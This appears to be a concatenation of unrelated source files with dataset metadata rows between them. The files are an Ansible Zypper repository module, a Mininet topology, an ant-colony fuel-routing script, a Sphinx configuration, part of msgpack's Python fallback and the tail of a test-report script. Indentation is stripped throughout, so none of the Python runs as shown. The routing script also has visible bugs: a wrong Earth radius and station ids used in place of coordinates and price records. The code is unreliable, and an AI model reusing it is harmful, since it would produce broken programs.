print id, hub, testname, runs, errors, fails, timeouts
c.execute('insert into parsed_command_record '
'(id, testname, hub, runs, errors, fails, timeouts) '
'values (?, ?, ?, ?, ?, ?, ?)',
(id, testname, hub, runs, errors, fails, timeouts))
c.commit()
if __name__=='__main__':
if not sys.argv[1:]:
latest_db = sorted(glob.glob('results.*.db'), key=lambda f: os.stat(f).st_mtime)[-1]
print latest_db
sys.argv.append(latest_db)
for db in sys.argv[1:]:
main(db)
execfile('generate_report.py')
| apache-2.0 | 1,373,256,941,787,906,300 | 32.990741 | 105 | 0.51076 | false |
perzizzle/ansible-modules-extras | packaging/os/zypper_repository.py | 22 | 8763 | #!/usr/bin/python
# encoding: utf-8
# (c) 2013, Matthias Vogelgesang <[email protected]>
# (c) 2014, Justin Lecher <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: zypper_repository
author: "Matthias Vogelgesang (@matze)"
version_added: "1.4"
short_description: Add and remove Zypper repositories
description:
- Add or remove Zypper repositories on SUSE and openSUSE
options:
name:
required: false
default: none
description:
- A name for the repository. Not required when adding repofiles.
repo:
required: false
default: none
description:
- URI of the repository or .repo file. Required when state=present.
state:
required: false
choices: [ "absent", "present" ]
default: "present"
description:
      - Whether the repository should be present or absent.
description:
required: false
default: none
description:
- A description of the repository
disable_gpg_check:
description:
- Whether to disable GPG signature checking of
all packages. Has an effect only if state is
I(present).
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
refresh:
description:
- Enable autorefresh of the repository.
required: false
default: "yes"
choices: [ "yes", "no" ]
aliases: []
notes: []
requirements: [ zypper ]
'''
EXAMPLES = '''
# Add NVIDIA repository for graphics drivers
- zypper_repository: name=nvidia-repo repo='ftp://download.nvidia.com/opensuse/12.2' state=present
# Remove NVIDIA repository
- zypper_repository: name=nvidia-repo repo='ftp://download.nvidia.com/opensuse/12.2' state=absent
# Add python development repository
- zypper_repository: repo=http://download.opensuse.org/repositories/devel:/languages:/python/SLE_11_SP3/devel:languages:python.repo
'''
REPO_OPTS = ['alias', 'name', 'priority', 'enabled', 'autorefresh', 'gpgcheck']
def zypper_version(module):
"""Return (rc, message) tuple"""
cmd = ['/usr/bin/zypper', '-V']
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
if rc == 0:
return rc, stdout
else:
return rc, stderr
def _parse_repos(module):
"""parses the output of zypper -x lr and returns a parse repo dictionary"""
cmd = ['/usr/bin/zypper', '-x', 'lr']
repos = []
from xml.dom.minidom import parseString as parseXML
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
dom = parseXML(stdout)
repo_list = dom.getElementsByTagName('repo')
for repo in repo_list:
opts = {}
for o in REPO_OPTS:
opts[o] = repo.getAttribute(o)
opts['url'] = repo.getElementsByTagName('url')[0].firstChild.data
# A repo can be uniquely identified by an alias + url
repos.append(opts)
return repos
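# Each entry returned by _parse_repos is a dict like (illustrative values only):
#   {'alias': 'repo-oss', 'name': 'Main Repository', 'priority': '99',
#    'enabled': '1', 'autorefresh': '1', 'gpgcheck': '1',
#    'url': 'http://download.opensuse.org/distribution/leap/15.5/repo/oss/'}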
def _parse_repos_old(module):
"""parses the output of zypper sl and returns a parse repo dictionary"""
cmd = ['/usr/bin/zypper', 'sl']
repos = []
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
for line in stdout.split('\n'):
matched = re.search(r'\d+\s+\|\s+(?P<enabled>\w+)\s+\|\s+(?P<autorefresh>\w+)\s+\|\s+(?P<type>\w+)\s+\|\s+(?P<name>\w+)\s+\|\s+(?P<url>.*)', line)
if matched == None:
continue
m = matched.groupdict()
m['alias']= m['name']
m['priority'] = 100
m['gpgcheck'] = 1
repos.append(m)
return repos
def repo_exists(module, old_zypper, **kwargs):
def repo_subset(realrepo, repocmp):
for k in repocmp:
if k not in realrepo:
return False
for k, v in realrepo.items():
if k in repocmp:
if v.rstrip("/") != repocmp[k].rstrip("/"):
return False
return True
if old_zypper:
repos = _parse_repos_old(module)
else:
repos = _parse_repos(module)
for repo in repos:
if repo_subset(repo, kwargs):
return True
return False
def add_repo(module, repo, alias, description, disable_gpg_check, old_zypper, refresh):
if old_zypper:
cmd = ['/usr/bin/zypper', 'sa']
else:
cmd = ['/usr/bin/zypper', 'ar', '--check']
if repo.startswith("file:/") and old_zypper:
cmd.extend(['-t', 'Plaindir'])
else:
cmd.extend(['-t', 'plaindir'])
if description:
cmd.extend(['--name', description])
if disable_gpg_check and not old_zypper:
cmd.append('--no-gpgcheck')
if refresh:
cmd.append('--refresh')
cmd.append(repo)
if not repo.endswith('.repo'):
cmd.append(alias)
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
changed = rc == 0
if rc == 0:
changed = True
elif 'already exists. Please use another alias' in stderr:
changed = False
else:
#module.fail_json(msg=stderr if stderr else stdout)
if stderr:
module.fail_json(msg=stderr)
else:
module.fail_json(msg=stdout)
return changed
def remove_repo(module, repo, alias, old_zypper):
if old_zypper:
cmd = ['/usr/bin/zypper', 'sd']
else:
cmd = ['/usr/bin/zypper', 'rr']
if alias:
cmd.append(alias)
else:
cmd.append(repo)
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
changed = rc == 0
return changed
def fail_if_rc_is_null(module, rc, stdout, stderr):
if rc != 0:
#module.fail_json(msg=stderr if stderr else stdout)
if stderr:
module.fail_json(msg=stderr)
else:
module.fail_json(msg=stdout)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=False),
repo=dict(required=False),
state=dict(choices=['present', 'absent'], default='present'),
description=dict(required=False),
disable_gpg_check = dict(required=False, default='no', type='bool'),
refresh = dict(required=False, default='yes', type='bool'),
),
supports_check_mode=False,
)
repo = module.params['repo']
state = module.params['state']
name = module.params['name']
description = module.params['description']
disable_gpg_check = module.params['disable_gpg_check']
refresh = module.params['refresh']
def exit_unchanged():
module.exit_json(changed=False, repo=repo, state=state, name=name)
rc, out = zypper_version(module)
match = re.match(r'zypper\s+(\d+)\.(\d+)\.(\d+)', out)
if not match or int(match.group(1)) > 0:
old_zypper = False
else:
old_zypper = True
# Check run-time module parameters
if state == 'present' and not repo:
module.fail_json(msg='Module option state=present requires repo')
if state == 'absent' and not repo and not name:
module.fail_json(msg='Alias or repo parameter required when state=absent')
if repo and repo.endswith('.repo'):
if name:
module.fail_json(msg='Incompatible option: \'name\'. Do not use name when adding repo files')
else:
if not name and state == "present":
module.fail_json(msg='Name required when adding non-repo files:')
if repo and repo.endswith('.repo'):
exists = repo_exists(module, old_zypper, url=repo, alias=name)
elif repo:
exists = repo_exists(module, old_zypper, url=repo)
else:
exists = repo_exists(module, old_zypper, alias=name)
if state == 'present':
if exists:
exit_unchanged()
changed = add_repo(module, repo, name, description, disable_gpg_check, old_zypper, refresh)
elif state == 'absent':
if not exists:
exit_unchanged()
changed = remove_repo(module, repo, name, old_zypper)
module.exit_json(changed=changed, repo=repo, state=state)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 | 1,061,772,929,313,967,600 | 29.427083 | 154 | 0.60881 | false |
lishuai12/onosfw-L3 | tools/test/topos/rftesttopo.py | 35 | 1679 | #!/usr/bin/env python
"""
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.node import RemoteController
from mininet.node import Node
from mininet.node import CPULimitedHost
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.util import dumpNodeConnections
class ReactiveForwardingTestTopo( Topo ):
"Internet Topology Zoo Specimen."
def __init__( self ):
"Create a topology."
# Initialize Topology
Topo.__init__( self )
# add nodes, switches first...
s1 = self.addSwitch( 's1' )
s2 = self.addSwitch( 's2' )
s3 = self.addSwitch( 's3' )
s4 = self.addSwitch( 's4' )
s5 = self.addSwitch( 's5' )
s6 = self.addSwitch( 's6' )
s7 = self.addSwitch( 's7' )
s8 = self.addSwitch( 's8' )
s9 = self.addSwitch( 's9' )
# ... and now hosts
h1 = self.addHost( 'h1' )
h2 = self.addHost( 'h2' )
h3 = self.addHost( 'h3' )
h4 = self.addHost( 'h4' )
# add edges between switch and corresponding host
self.addLink( s1 , h1 )
self.addLink( s2 , h2 )
self.addLink( s3 , h3 )
self.addLink( s4 , h4 )
# add edges between switches
self.addLink( s1 , s5 )
self.addLink( s2 , s5 )
self.addLink( s2 , s8 )
self.addLink( s3 , s4 )
self.addLink( s3 , s7 )
self.addLink( s4 , s5 )
self.addLink( s6 , s8 )
self.addLink( s6 , s7 )
self.addLink( s5 , s9 )
self.addLink( s6 , s9 )
topos = { 'att': ( lambda: ReactiveForwardingTestTopo() ) }
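# Assumed invocation from Mininet (illustrative, not part of the original file):
#   sudo mn --custom rftesttopo.py --topo att --controller remote,ip=<onos-ip>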
| apache-2.0 | 105,193,427,664,448,300 | 27.457627 | 59 | 0.57296 | false |
pycharmers-hackathon/hackathon-rep | SmartFuel/SmartFuel/aco.py | 2 | 3615 | from math import radians, cos, sin, sqrt, atan2
import random
import operator
def aco(petrol_stations, gas_type, capacity, initial_petrol, overall_dist,
consumption, source, target, ants=2, a=1, b=1, iterations=10):
pheromone = {station['id']: 4 for station in petrol_stations}
probability = lambda source, i, feasible, dist: pheromone[i] ** a * h(source, i, dist) ** b / \
summation(source, feasible, calulate_distance)
summation = lambda source, feasible, dist: sum(pheromone[i] ** a * h(source, i, dist) ** b
for i in feasible)
h = lambda source, i, dist: 1.22000 / dist(source, i)
solutions = []
overall_best_sol = None
overall_cost = float('inf')
for i in range(iterations):
best_sol = None
best_cost = float('inf')
for j in range(ants):
sol, cost = construct_solution(source, target, petrol_stations, initial_petrol,
consumption, overall_dist, probability,
capacity, gas_type)
solutions.append((sol, cost))
if cost < best_cost:
best_cost = cost
best_sol = sol
if best_cost < overall_cost:
overall_cost = best_cost
overall_best_sol = best_sol
update_pheromone(pheromone, best_sol, best_cost)
return overall_best_sol, overall_cost
def construct_solution(source, target, petrol_stations, initial_petrol,
consumption, overall_dist, probability, capacity,
gas_type):
feasible_dist = initial_petrol * consumption
dist = calulate_distance(source, target)
sol = []
cost = 0.0
while feasible_dist < dist:
feasible_stations = get_feasible(source, target, petrol_stations,
feasible_dist, overall_dist)
p = {feasible_station: probability(source, feasible_station, feasible_stations,
calulate_distance)
for feasible_station in feasible_stations}
next_patrol = max(p.iteritems(), key=operator.itemgetter(1))[0]
quantity = calulate_distance(source, next_patrol) * consumption
feasible_dist = (capacity - quantity) * consumption
sol.append({next_patrol: quantity})
source = next_patrol
cost += quantity * next_patrol[gas_type]
return sol, cost
def update_pheromone(pheromone, sol, cost):
    # sol is a list of single-entry dicts mapping station id -> refuel quantity
    for item in sol:
        for station_id in item:
            pheromone[station_id] += 1.0 / cost
def calulate_distance(source, target):
R = 3673.0
source_lat = radians(source[0])
source_lng = radians(source[1])
target_lat = radians(target[0])
target_lng = radians(target[1])
dist_lat = target_lat - source_lat
dist_lng = target_lng - source_lng
a = sin(dist_lat / 2) ** 2 + cos(source_lat) * cos(target_lat) * sin(dist_lng / 2) ** 2
c = 2 * atan2(sqrt(a), sqrt(1 - a))
return R * c
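# Worked example (computed from the formula above; note the non-standard
# radius constant R = 3673.0, so the result is in whatever unit that radius
# is expressed in):
#   calulate_distance((0.0, 0.0), (0.0, 1.0)) ~= 64.1   # one degree of longitude at the equator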
def get_feasible(source, target, petrol_stations, feasible_dist, overall_dist):
"""Returns list of ids. """
accepted = []
for petrol_station in petrol_stations:
dist1 = calulate_distance(source, (petrol_station['latitude'],
petrol_station['longitude']))
dist2 = calulate_distance((petrol_station['latitude'], petrol_station['longitude'])
, target)
if dist2 > overall_dist:
continue
if dist1 <= feasible_dist:
accepted.append(petrol_station['id'])
return accepted | cc0-1.0 | 8,963,224,348,596,850,000 | 39.177778 | 99 | 0.584786 | false |
bcarlin/flask-scss | doc/conf.py | 1 | 7157 | # -*- coding: utf-8 -*-
#
# Flask-Scss documentation build configuration file, created by
# sphinx-quickstart on Fri Jul 8 17:32:32 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Flask-Scss'
copyright = u'2013, Bruno Carlin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.5'
# The full version, including alpha/beta/rc tags.
release = '0.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['.build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for Autodoc extensions -------------------------------------------
autoclass_content = 'both'
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'flask_small'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['.themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['.static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Flask-Scssdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Flask-Scss.tex', u'Flask-Scss Documentation',
u'Bruno Carlin', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'flask-scss', u'Flask-Scss Documentation',
[u'Bruno Carlin'], 1)
]
| mit | 2,545,251,070,512,069,600 | 31.680365 | 80 | 0.703926 | false |
tdmsinc/three.js | utils/converters/msgpack/msgpack/fallback.py | 641 | 26403 | """Fallback pure Python implementation of msgpack"""
import sys
import array
import struct
if sys.version_info[0] == 3:
PY3 = True
int_types = int
Unicode = str
xrange = range
def dict_iteritems(d):
return d.items()
else:
PY3 = False
int_types = (int, long)
Unicode = unicode
def dict_iteritems(d):
return d.iteritems()
if hasattr(sys, 'pypy_version_info'):
# cStringIO is slow on PyPy, StringIO is faster. However: PyPy's own
# StringBuilder is fastest.
from __pypy__ import newlist_hint
from __pypy__.builders import StringBuilder
USING_STRINGBUILDER = True
class StringIO(object):
def __init__(self, s=b''):
if s:
self.builder = StringBuilder(len(s))
self.builder.append(s)
else:
self.builder = StringBuilder()
def write(self, s):
self.builder.append(s)
def getvalue(self):
return self.builder.build()
else:
USING_STRINGBUILDER = False
from io import BytesIO as StringIO
newlist_hint = lambda size: []
from msgpack.exceptions import (
BufferFull,
OutOfData,
UnpackValueError,
PackValueError,
ExtraData)
from msgpack import ExtType
EX_SKIP = 0
EX_CONSTRUCT = 1
EX_READ_ARRAY_HEADER = 2
EX_READ_MAP_HEADER = 3
TYPE_IMMEDIATE = 0
TYPE_ARRAY = 1
TYPE_MAP = 2
TYPE_RAW = 3
TYPE_BIN = 4
TYPE_EXT = 5
DEFAULT_RECURSE_LIMIT = 511
def unpack(stream, **kwargs):
"""
Unpack an object from `stream`.
Raises `ExtraData` when `packed` contains extra bytes.
See :class:`Unpacker` for options.
"""
unpacker = Unpacker(stream, **kwargs)
ret = unpacker._fb_unpack()
if unpacker._fb_got_extradata():
raise ExtraData(ret, unpacker._fb_get_extradata())
return ret
def unpackb(packed, **kwargs):
"""
Unpack an object from `packed`.
Raises `ExtraData` when `packed` contains extra bytes.
See :class:`Unpacker` for options.
"""
unpacker = Unpacker(None, **kwargs)
unpacker.feed(packed)
try:
ret = unpacker._fb_unpack()
except OutOfData:
raise UnpackValueError("Data is not enough.")
if unpacker._fb_got_extradata():
raise ExtraData(ret, unpacker._fb_get_extradata())
return ret
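# Illustrative round-trip (assumed usage, not part of the library source):
#   packed = Packer().pack([1, 2, 3])
#   assert unpackb(packed) == [1, 2, 3]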
class Unpacker(object):
"""
Streaming unpacker.
`file_like` is a file-like object having a `.read(n)` method.
When `Unpacker` is initialized with a `file_like`, `.feed()` is not
usable.
`read_size` is used for `file_like.read(read_size)`.
If `use_list` is True (default), msgpack lists are deserialized to Python
lists. Otherwise they are deserialized to tuples.
`object_hook` is the same as in simplejson. If it is not None, it should
be callable and Unpacker calls it with a dict argument after deserializing
a map.
`object_pairs_hook` is the same as in simplejson. If it is not None, it
should be callable and Unpacker calls it with a list of key-value pairs
after deserializing a map.
`ext_hook` is callback for ext (User defined) type. It called with two
arguments: (code, bytes). default: `msgpack.ExtType`
`encoding` is the encoding used for decoding msgpack bytes. If it is
None (default), msgpack bytes are deserialized to Python bytes.
`unicode_errors` is used for decoding bytes.
`max_buffer_size` limits the buffer size. 0 means INT_MAX (default).
    Raises `BufferFull` exception when it is insufficient.
    You should set this parameter when unpacking data from an untrusted source.
example of streaming deserialization from file-like object::
unpacker = Unpacker(file_like)
for o in unpacker:
do_something(o)
example of streaming deserialization from socket::
unpacker = Unpacker()
while 1:
buf = sock.recv(1024*2)
if not buf:
break
unpacker.feed(buf)
for o in unpacker:
do_something(o)
"""
def __init__(self, file_like=None, read_size=0, use_list=True,
object_hook=None, object_pairs_hook=None, list_hook=None,
encoding=None, unicode_errors='strict', max_buffer_size=0,
ext_hook=ExtType):
if file_like is None:
self._fb_feeding = True
else:
if not callable(file_like.read):
raise TypeError("`file_like.read` must be callable")
self.file_like = file_like
self._fb_feeding = False
self._fb_buffers = []
self._fb_buf_o = 0
self._fb_buf_i = 0
self._fb_buf_n = 0
self._max_buffer_size = max_buffer_size or 2**31-1
if read_size > self._max_buffer_size:
raise ValueError("read_size must be smaller than max_buffer_size")
self._read_size = read_size or min(self._max_buffer_size, 2048)
self._encoding = encoding
self._unicode_errors = unicode_errors
self._use_list = use_list
self._list_hook = list_hook
self._object_hook = object_hook
self._object_pairs_hook = object_pairs_hook
self._ext_hook = ext_hook
if list_hook is not None and not callable(list_hook):
raise TypeError('`list_hook` is not callable')
if object_hook is not None and not callable(object_hook):
raise TypeError('`object_hook` is not callable')
if object_pairs_hook is not None and not callable(object_pairs_hook):
raise TypeError('`object_pairs_hook` is not callable')
if object_hook is not None and object_pairs_hook is not None:
raise TypeError("object_pairs_hook and object_hook are mutually "
"exclusive")
if not callable(ext_hook):
raise TypeError("`ext_hook` is not callable")
def feed(self, next_bytes):
if isinstance(next_bytes, array.array):
next_bytes = next_bytes.tostring()
elif isinstance(next_bytes, bytearray):
next_bytes = bytes(next_bytes)
assert self._fb_feeding
if self._fb_buf_n + len(next_bytes) > self._max_buffer_size:
raise BufferFull
self._fb_buf_n += len(next_bytes)
self._fb_buffers.append(next_bytes)
def _fb_consume(self):
self._fb_buffers = self._fb_buffers[self._fb_buf_i:]
if self._fb_buffers:
self._fb_buffers[0] = self._fb_buffers[0][self._fb_buf_o:]
self._fb_buf_o = 0
self._fb_buf_i = 0
self._fb_buf_n = sum(map(len, self._fb_buffers))
def _fb_got_extradata(self):
if self._fb_buf_i != len(self._fb_buffers):
return True
if self._fb_feeding:
return False
if not self.file_like:
return False
if self.file_like.read(1):
return True
return False
def __iter__(self):
return self
def read_bytes(self, n):
return self._fb_read(n)
def _fb_rollback(self):
self._fb_buf_i = 0
self._fb_buf_o = 0
def _fb_get_extradata(self):
bufs = self._fb_buffers[self._fb_buf_i:]
if bufs:
bufs[0] = bufs[0][self._fb_buf_o:]
return b''.join(bufs)
def _fb_read(self, n, write_bytes=None):
buffs = self._fb_buffers
if (write_bytes is None and self._fb_buf_i < len(buffs) and
self._fb_buf_o + n < len(buffs[self._fb_buf_i])):
self._fb_buf_o += n
return buffs[self._fb_buf_i][self._fb_buf_o - n:self._fb_buf_o]
ret = b''
while len(ret) != n:
if self._fb_buf_i == len(buffs):
if self._fb_feeding:
break
tmp = self.file_like.read(self._read_size)
if not tmp:
break
buffs.append(tmp)
continue
sliced = n - len(ret)
ret += buffs[self._fb_buf_i][self._fb_buf_o:self._fb_buf_o + sliced]
self._fb_buf_o += sliced
if self._fb_buf_o >= len(buffs[self._fb_buf_i]):
self._fb_buf_o = 0
self._fb_buf_i += 1
if len(ret) != n:
self._fb_rollback()
raise OutOfData
if write_bytes is not None:
write_bytes(ret)
return ret
def _read_header(self, execute=EX_CONSTRUCT, write_bytes=None):
typ = TYPE_IMMEDIATE
n = 0
obj = None
c = self._fb_read(1, write_bytes)
b = ord(c)
if b & 0b10000000 == 0:
obj = b
elif b & 0b11100000 == 0b11100000:
obj = struct.unpack("b", c)[0]
elif b & 0b11100000 == 0b10100000:
n = b & 0b00011111
obj = self._fb_read(n, write_bytes)
typ = TYPE_RAW
elif b & 0b11110000 == 0b10010000:
n = b & 0b00001111
typ = TYPE_ARRAY
elif b & 0b11110000 == 0b10000000:
n = b & 0b00001111
typ = TYPE_MAP
elif b == 0xc0:
obj = None
elif b == 0xc2:
obj = False
elif b == 0xc3:
obj = True
elif b == 0xc4:
typ = TYPE_BIN
n = struct.unpack("B", self._fb_read(1, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xc5:
typ = TYPE_BIN
n = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xc6:
typ = TYPE_BIN
n = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xc7: # ext 8
typ = TYPE_EXT
L, n = struct.unpack('Bb', self._fb_read(2, write_bytes))
obj = self._fb_read(L, write_bytes)
elif b == 0xc8: # ext 16
typ = TYPE_EXT
L, n = struct.unpack('>Hb', self._fb_read(3, write_bytes))
obj = self._fb_read(L, write_bytes)
elif b == 0xc9: # ext 32
typ = TYPE_EXT
L, n = struct.unpack('>Ib', self._fb_read(5, write_bytes))
obj = self._fb_read(L, write_bytes)
elif b == 0xca:
obj = struct.unpack(">f", self._fb_read(4, write_bytes))[0]
elif b == 0xcb:
obj = struct.unpack(">d", self._fb_read(8, write_bytes))[0]
elif b == 0xcc:
obj = struct.unpack("B", self._fb_read(1, write_bytes))[0]
elif b == 0xcd:
obj = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
elif b == 0xce:
obj = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
elif b == 0xcf:
obj = struct.unpack(">Q", self._fb_read(8, write_bytes))[0]
elif b == 0xd0:
obj = struct.unpack("b", self._fb_read(1, write_bytes))[0]
elif b == 0xd1:
obj = struct.unpack(">h", self._fb_read(2, write_bytes))[0]
elif b == 0xd2:
obj = struct.unpack(">i", self._fb_read(4, write_bytes))[0]
elif b == 0xd3:
obj = struct.unpack(">q", self._fb_read(8, write_bytes))[0]
elif b == 0xd4: # fixext 1
typ = TYPE_EXT
n, obj = struct.unpack('b1s', self._fb_read(2, write_bytes))
elif b == 0xd5: # fixext 2
typ = TYPE_EXT
n, obj = struct.unpack('b2s', self._fb_read(3, write_bytes))
elif b == 0xd6: # fixext 4
typ = TYPE_EXT
n, obj = struct.unpack('b4s', self._fb_read(5, write_bytes))
elif b == 0xd7: # fixext 8
typ = TYPE_EXT
n, obj = struct.unpack('b8s', self._fb_read(9, write_bytes))
elif b == 0xd8: # fixext 16
typ = TYPE_EXT
n, obj = struct.unpack('b16s', self._fb_read(17, write_bytes))
elif b == 0xd9:
typ = TYPE_RAW
n = struct.unpack("B", self._fb_read(1, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xda:
typ = TYPE_RAW
n = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xdb:
typ = TYPE_RAW
n = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
obj = self._fb_read(n, write_bytes)
elif b == 0xdc:
n = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
typ = TYPE_ARRAY
elif b == 0xdd:
n = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
typ = TYPE_ARRAY
elif b == 0xde:
n = struct.unpack(">H", self._fb_read(2, write_bytes))[0]
typ = TYPE_MAP
elif b == 0xdf:
n = struct.unpack(">I", self._fb_read(4, write_bytes))[0]
typ = TYPE_MAP
else:
raise UnpackValueError("Unknown header: 0x%x" % b)
return typ, n, obj
def _fb_unpack(self, execute=EX_CONSTRUCT, write_bytes=None):
typ, n, obj = self._read_header(execute, write_bytes)
if execute == EX_READ_ARRAY_HEADER:
if typ != TYPE_ARRAY:
raise UnpackValueError("Expected array")
return n
if execute == EX_READ_MAP_HEADER:
if typ != TYPE_MAP:
raise UnpackValueError("Expected map")
return n
# TODO should we eliminate the recursion?
if typ == TYPE_ARRAY:
if execute == EX_SKIP:
for i in xrange(n):
# TODO check whether we need to call `list_hook`
self._fb_unpack(EX_SKIP, write_bytes)
return
ret = newlist_hint(n)
for i in xrange(n):
ret.append(self._fb_unpack(EX_CONSTRUCT, write_bytes))
if self._list_hook is not None:
ret = self._list_hook(ret)
# TODO is the interaction between `list_hook` and `use_list` ok?
return ret if self._use_list else tuple(ret)
if typ == TYPE_MAP:
if execute == EX_SKIP:
for i in xrange(n):
# TODO check whether we need to call hooks
self._fb_unpack(EX_SKIP, write_bytes)
self._fb_unpack(EX_SKIP, write_bytes)
return
if self._object_pairs_hook is not None:
ret = self._object_pairs_hook(
(self._fb_unpack(EX_CONSTRUCT, write_bytes),
self._fb_unpack(EX_CONSTRUCT, write_bytes))
for _ in xrange(n))
else:
ret = {}
for _ in xrange(n):
key = self._fb_unpack(EX_CONSTRUCT, write_bytes)
ret[key] = self._fb_unpack(EX_CONSTRUCT, write_bytes)
if self._object_hook is not None:
ret = self._object_hook(ret)
return ret
if execute == EX_SKIP:
return
if typ == TYPE_RAW:
if self._encoding is not None:
obj = obj.decode(self._encoding, self._unicode_errors)
return obj
if typ == TYPE_EXT:
return self._ext_hook(n, obj)
if typ == TYPE_BIN:
return obj
assert typ == TYPE_IMMEDIATE
return obj
def next(self):
try:
ret = self._fb_unpack(EX_CONSTRUCT, None)
self._fb_consume()
return ret
except OutOfData:
raise StopIteration
__next__ = next
def skip(self, write_bytes=None):
self._fb_unpack(EX_SKIP, write_bytes)
self._fb_consume()
def unpack(self, write_bytes=None):
